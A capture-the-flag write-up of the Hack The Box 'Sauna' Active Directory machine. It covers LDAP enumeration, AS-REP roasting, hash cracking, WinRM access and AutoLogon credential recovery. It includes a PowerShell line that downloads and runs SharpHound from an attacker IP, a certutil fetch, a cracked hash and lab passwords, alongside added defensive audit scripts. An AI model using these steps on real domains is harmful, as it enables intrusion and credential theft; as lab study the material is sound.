htb-sauna-nl

As always we start with an nmap scan

# Nmap 7.80 scan initiated Tue Feb 18 03:17:50 2020 as: nmap -A -oN allports 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.076s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-18 16:19:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/18%Time=5E4B9DC1%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m51s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-02-18T16:22:19
|_ start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 100.30 ms 10.10.16.1
2 100.29 ms 10.10.10.175

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 18 03:23:06 2020 -- 1 IP address (1 host up) scanned in 317.70 seconds

The most interesting open ports were HTTP (80), Kerberos (88) and WinRM (5985).

User
I enumerated the LDAP port. A lot of information was returned, but the most interesting part was:

root@kali:~/htb/sauna# ldapsearch -h 10.10.10.175 -p 389 -x -b "dc=EGOTISTICAL-BANK,dc=LOCAL" > ldaplogall.txt
root@kali:~/htb/sauna# ls
allports ldaplogall.txt

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

Now we have a possible username: “Hugo Smith”.
If you try to AS-REP roast that user you will find that it doesn’t exist: the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN. So I tried variations of the name and found one that was indeed a valid user: hsmith. For an existing account the KDC answers differently (the account exists but still requires pre-authentication), which is how a valid name can be told apart from an unknown one.
Variations I tried:

Hugo Smith
HugoSmith
hugo.smith
h.smith
hsmith
smithh
smith.h
smith.hugo
smithhugo
smith hugo

Found user:

root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/ -usersfile hugosmith.txt
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] invalid principal syntax

So, now we have a valid user “hsmith” but no password.
It’s time to take a look at the web server. There you will only find a few HTML pages, but some of them contain interesting names:

Now that we know the format used to create the usernames (first initial followed by the surname), let’s check these usernames:

fsmith
scoins
sdriver
btaylor
hbear

We found that the user “fsmith” is vulnerable to AS-REP roasting (the account does not require Kerberos pre-authentication), and we have obtained the crackable “hash”:

root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.LOCAL/FSmith
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for FSmith
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:cb52c62c6143cf4cc4c71dccf64756f5$d216f5b0ae6326c1a3027dd19f3976e5a8259a5a1c4118f7f61da536f069ac63b15d65498c22399ff1d985819c280dbda2b88236429eaf03d4b1e25b7ba49323a378e4854c3e0b26b6ec7bb4c5245651e32ffb84025e34d9b05db659e80f2b510ccfcb3e0274b13fff13b6e650a987cb2d73f8288239ca15f7aa19e0914f48e5ccfe49af81e1aaf2f3864ed48ebe21e8f32258eeedcf7924022213178f4175dafd77b97dae029dbf57648cafd31769624759538c9f56a92cbf3bb52af1c19488fc633abedb85df88b6297cd921006a2e0706f20ae5a05d5091feeee6870ff014496e38ba7b397d90e4a42bb46940b2cecda70ac4de67dd1ed817028f37cbe46b
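What makes fsmith roastable is the DONT_REQ_PREAUTH bit in the account's userAccountControl attribute. The following is an added example (not code from the write-up) showing how a defender would audit a domain for that setting: it builds the LDAP filter that lists such accounts, decodes the flag bits, and excludes disabled accounts, which the KDC will not issue a TGT to anyway. The LDAP entries are constructed; only the account names hsmith and fsmith come from the page, the userAccountControl values are made up for illustration.

```python
"""Audit user entries for Kerberos pre-authentication being disabled.

Added example, not code from the write-up. The LDAP entries below are
constructed: only the account names hsmith and fsmith come from the page,
the userAccountControl values are made up for illustration.
"""
from __future__ import annotations

# Documented userAccountControl bit flags
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWD = 0x10000
DONT_REQ_PREAUTH = 0x400000

# LDAP extensible-match rule for a bitwise AND, usable directly in an ldapsearch filter
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

FLAG_NAMES = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
}


def preauth_disabled_filter(include_disabled: bool = False) -> str:
    """Build the LDAP filter that lists users with DONT_REQ_PREAUTH set.

    Disabled accounts are excluded by default: the KDC refuses them a TGT,
    so they are not roastable even with the flag set.
    """
    has_flag = f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={DONT_REQ_PREAUTH})"
    not_disabled = f"(!(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={ACCOUNTDISABLE}))"
    parts = "(objectCategory=person)(objectClass=user)" + has_flag
    if not include_disabled:
        parts += not_disabled
    return f"(&{parts})"


def decode_uac(value: int) -> list[str]:
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in FLAG_NAMES.items() if value & bit]


def asrep_roastable(entries: list[dict]) -> list[str]:
    """Return sAMAccountNames of enabled accounts that do not require pre-auth."""
    found = []
    for entry in entries:
        uac = int(entry["userAccountControl"])
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            found.append(entry["sAMAccountName"])
    return found


# Constructed sample entries (shape follows what an LDAP search would return)
SAMPLE_ENTRIES = [
    {"sAMAccountName": "hsmith", "userAccountControl": 0x10200},    # normal, pre-auth required
    {"sAMAccountName": "fsmith", "userAccountControl": 0x410200},   # pre-auth not required
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202},  # flag set, but account disabled
]

if __name__ == "__main__":
    print("LDAP filter:", preauth_disabled_filter())
    for name in asrep_roastable(SAMPLE_ENTRIES):
        print("pre-auth disabled:", name, decode_uac(0x410200))
```

The filter string can be pasted straight into ldapsearch against the base DN used above. On the detection side, a roasting attempt shows up on the DC as a 4768 (TGT requested) event with Pre-Authentication Type 0, typically with RC4 (0x17) as the ticket encryption type, which is what the $krb5asrep$23$ prefix of the hash corresponds to.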

So, let’s crack it with rockyou. I first tried hashcat (mode 18200, krb5asrep), which did not work for me:

c:\PENTEST\HASHCAT>hashcat32.exe -m 18200 -a 0 -w 3 EGOTISTICAL-BANK.hash e:\pentest\rockyou.txt --force
hashcat (v5.1.0) starting...

John with rockyou cracked it:

root@kali:~/htb/sauna# john ego.hash -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:33 DONE (2020-02-18 04:48) 0.02995g/s 315720p/s 315720c/s 315720C/s Thines..Theredwolf_120691
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Credentials found: fsmith:Thestrokes23
Now, just connect via WinRM and grab the user flag (and upload winPEAS for the next step):

root@kali/opt/evil-winrm# ruby evil-winrm.rb -u fsmith -p "Thestrokes23" -i EGOTISTICAL-BANK.LOCAL

*Evil-WinRM* PS C:\Users\FSmith\desktop> type user.txt
1b5520b98d97cf17f24122a55baf70cf
*Evil-WinRM* PS C:\Users\FSmith\desktop> certutil -urlcache -split -f http://10.10.14.10/WINPEAS.exe C:\Users\FSmith\Documents\WINPEAS.exe

Root

I started enumerating the box using winPEAS.

*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winpeas.exe systeminfo userinfo
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Creating Dynamic lists, this could take a while, please wait...
- Checking if domain...
- Getting Win32_UserAccount info...
--snip--


  [+] RDP Sessions(T1087&T1033)
    Not Found

  [+] Ever logged users(T1087&T1033)
  [X] Exception: System.Management.ManagementException: Access denied 
   at System.Management.ThreadDispatch.Start()
   at System.Management.ManagementScope.Initialize()
   at System.Management.ManagementObjectSearcher.Initialize()
   at System.Management.ManagementObjectSearcher.Get()
   at winPEAS.UserInfo.GetEverLoggedUsers()
    Not Found

  [+] Looking for AutoLogon credentials(T1012)
    Some AutoLogon credentials were found!!
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

The same values can be read manually from the Winlogon registry key:

*Evil-WinRM* PS C:\Users\FSmith\Documents> REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ 
LegalNoticeText REG_SZ 
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x8e3982368
ShutdownFlags REG_DWORD 0x80000027
DisableLockWorkstation REG_DWORD 0x0
DefaultPassword REG_SZ Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey
*Evil-WinRM* PS C:\Users\FSmith\Documents>

winPEAS found automatic-logon credentials stored in the Winlogon registry key. There isn’t any user called “svc_loanmanager”, but there is one called “svc_loanmgr”, and the password from the registry works for it:

svc_loanmgr : Moneymakestheworldgoround!

You can connect as that user with the password extracted from the registry (session below).
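A cleartext DefaultPassword under Winlogon is readable by any local user, which is exactly how the credential above was recovered. The following is an added example (not code from the write-up) of a small audit that parses REG QUERY output for that key and reports the AutoLogon state without echoing the secret itself. The dump it parses is constructed from a trimmed subset of the values shown above; the AutoAdminLogon value is absent there, as it is in the page's output, so the check reports it as missing.

```python
"""Check a Winlogon registry dump for stored automatic-logon credentials.

Added example, not code from the write-up. The dump below is constructed
from a subset of the values shown in the REG QUERY output on the page.
"""
from __future__ import annotations

import re

# Constructed input: a trimmed version of the page's REG QUERY output
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    CachedLogonsCount    REG_SZ    10
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    LegalNoticeCaption    REG_SZ
    Shell    REG_SZ    explorer.exe
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
"""

# One value line: name, REG_* type, then the (possibly empty) data.
# Key-path lines never match because "Windows NT" is not followed by a REG_ type.
VALUE_LINE = re.compile(r"^\s*(\S+)\s+(REG_[A-Z_]+)\s*(.*?)\s*$")


def parse_reg_query(text: str) -> dict[str, tuple[str, str]]:
    """Map value name -> (type, data) for every value line in REG QUERY output."""
    values: dict[str, tuple[str, str]] = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values[m.group(1)] = (m.group(2), m.group(3))
    return values


def audit_autologon(text: str) -> dict:
    """Summarise the AutoLogon configuration; the password itself is never returned."""
    values = parse_reg_query(text)
    password = values.get("DefaultPassword", ("", ""))[1]
    auto = values.get("AutoAdminLogon")
    return {
        "username": values.get("DefaultUserName", ("", ""))[1] or None,
        "domain": values.get("DefaultDomainName", ("", ""))[1] or None,
        "auto_admin_logon": auto[1] if auto else None,
        "cleartext_password": bool(password),
        "password_length": len(password),
    }


if __name__ == "__main__":
    report = audit_autologon(SAMPLE_REG_QUERY)
    if report["cleartext_password"]:
        print(f"FINDING: cleartext DefaultPassword for {report['username']} "
              f"({report['password_length']} chars)")
```

The remediation is to remove the DefaultPassword value and, if automatic logon is really needed, store the secret as the LSA secret DefaultPassword instead (the Sysinternals Autologon tool does this), which ordinary users cannot read; the referenced account should also be rotated, since anyone who could read the key has had the password.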

You can also use SharpHound to enumerate the domain, and you will find that the user svc_loanmgr has the permissions needed to run DCSync against the DC:

root@kali:/opt/evil-winrm# ruby evil-winrm.rb -u svc_loanmgr -p "Moneymakestheworldgoround!" -i EGOTISTICAL-BANK.LOCAL

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.70/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
Initializing BloodHound at 5:42 PM on 2/18/2020
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Status: 60 objects enumerated (+60 ∞/s --- Using 83 MB RAM )
Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:00.4511238
0 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish

Compressing data to C:\Users\svc_loanmgr\Documents\20200218174244_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20200218174244_BloodHound.zip
Info: Downloading 20200218174244_BloodHound.zip to 20200218174244_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> exit
Info: Exiting with code 0
root@kali:/opt/evil-winrm#
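What BloodHound surfaces for svc_loanmgr is an ACL finding: the account holds the two replication extended rights on the domain object (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) that together allow DCSync. The following is an added example (not code from the write-up or from BloodHound) of the audit a defender would run over the domain head's ACL to flag principals holding both rights that are not domain controllers or administrators. The ACE list is constructed in a simplified shape (not BloodHound's JSON); the only page-derived detail is that svc_loanmgr holds the rights. It goes slightly beyond the page's case by also handling GenericAll, an ExtendedRight ACE with no object type (all extended rights), and deny ACEs.

```python
"""Flag principals holding DCSync rights on the domain object.

Added example, not code from the write-up or from BloodHound. The ACE list
below is constructed (a simplified shape, not BloodHound's JSON); the only
page-derived detail is that svc_loanmgr holds the replication rights.
"""
from __future__ import annotations

# Extended-right GUIDs that together allow replicating secrets (DCSync)
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DCSYNC_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Principals that legitimately hold both rights in a default domain
EXPECTED_PRINCIPALS = {"Domain Controllers", "Enterprise Domain Controllers", "Administrators"}

# Constructed ACEs on the domain head (DC=EGOTISTICAL-BANK,DC=LOCAL)
SAMPLE_ACES = [
    {"trustee": "Domain Controllers", "right": "ExtendedRight", "object_type": DS_REPLICATION_GET_CHANGES},
    {"trustee": "Domain Controllers", "right": "ExtendedRight", "object_type": DS_REPLICATION_GET_CHANGES_ALL},
    {"trustee": "Administrators", "right": "ExtendedRight", "object_type": DS_REPLICATION_GET_CHANGES},
    {"trustee": "Administrators", "right": "ExtendedRight", "object_type": DS_REPLICATION_GET_CHANGES_ALL},
    # Read-only DCs only get the first right by default: not enough for DCSync
    {"trustee": "Enterprise Read-only Domain Controllers", "right": "ExtendedRight",
     "object_type": DS_REPLICATION_GET_CHANGES},
    {"trustee": "svc_loanmgr", "right": "ExtendedRight", "object_type": DS_REPLICATION_GET_CHANGES},
    {"trustee": "svc_loanmgr", "right": "ExtendedRight", "object_type": DS_REPLICATION_GET_CHANGES_ALL},
    # helpdesk is granted both but explicitly denied Get-Changes-All
    {"trustee": "helpdesk", "right": "ExtendedRight", "object_type": DS_REPLICATION_GET_CHANGES},
    {"trustee": "helpdesk", "right": "ExtendedRight", "object_type": DS_REPLICATION_GET_CHANGES_ALL},
    {"trustee": "helpdesk", "right": "ExtendedRight", "object_type": DS_REPLICATION_GET_CHANGES_ALL,
     "type": "Deny"},
]


def _rights_of(ace: dict) -> set[str]:
    """Which of the two replication rights a single ACE covers."""
    if ace["right"] == "GenericAll":
        return set(DCSYNC_RIGHTS)  # full control implies every extended right
    if ace["right"] == "ExtendedRight":
        obj = ace.get("object_type") or ""
        if obj == "":
            return set(DCSYNC_RIGHTS)  # no object type = all extended rights
        if obj in DCSYNC_RIGHTS:
            return {obj}
    return set()


def effective_replication_rights(aces: list[dict]) -> dict[str, set[str]]:
    """Per trustee, allowed replication rights minus explicitly denied ones.

    This is a flat approximation: real ACL evaluation also resolves group
    membership and honours ACE ordering and inheritance.
    """
    allowed: dict[str, set[str]] = {}
    denied: dict[str, set[str]] = {}
    for ace in aces:
        bucket = denied if ace.get("type", "Allow") == "Deny" else allowed
        bucket.setdefault(ace["trustee"], set()).update(_rights_of(ace))
    return {t: r - denied.get(t, set()) for t, r in allowed.items()}


def unexpected_dcsync(aces: list[dict], expected=EXPECTED_PRINCIPALS) -> list[str]:
    """Return trustees able to DCSync that are not in the expected set."""
    granted = effective_replication_rights(aces)
    return sorted(t for t, r in granted.items() if DCSYNC_RIGHTS <= r and t not in expected)


if __name__ == "__main__":
    for trustee in unexpected_dcsync(SAMPLE_ACES):
        print("FINDING: unexpected DCSync rights held by", trustee)
```

Real input can come from the ACL data that the SharpHound run above collected (ACL is in its resolved collection methods). For detection rather than prevention, a DCSync performed by such an account produces a 4662 event on the DC whose property GUIDs are the two replication rights above, issued to an account that is not a domain controller.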

 
